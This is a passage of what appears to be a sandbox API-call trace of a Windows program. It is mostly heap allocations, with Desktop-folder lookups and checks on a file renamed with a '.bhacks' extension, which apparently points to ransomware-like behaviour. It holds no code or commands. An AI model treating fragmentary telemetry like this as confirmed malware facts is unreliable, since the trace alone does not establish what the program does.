lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Kz5g.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z5g.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5g.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g.mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.070] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0102.070] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0102.070] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de40 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0102.071] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.071] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ad0 | out: hHeap=0x2af0000) returned 1 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72778 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.071] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0102.071] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.071] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9328 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.072] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75678 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0102.072] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.072] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0102.073] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9178 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.073] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61e8 [0102.073] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.073] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f40 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa61e8 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f40 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0102.074] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9208 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.074] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0102.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0102.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0102.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0102.075] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0102.075] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0102.075] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0102.076] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77aa8 | out: hHeap=0x2af0000) returned 1 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0102.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0102.076] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0102.076] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.076] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0102.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0102.077] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0102.077] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 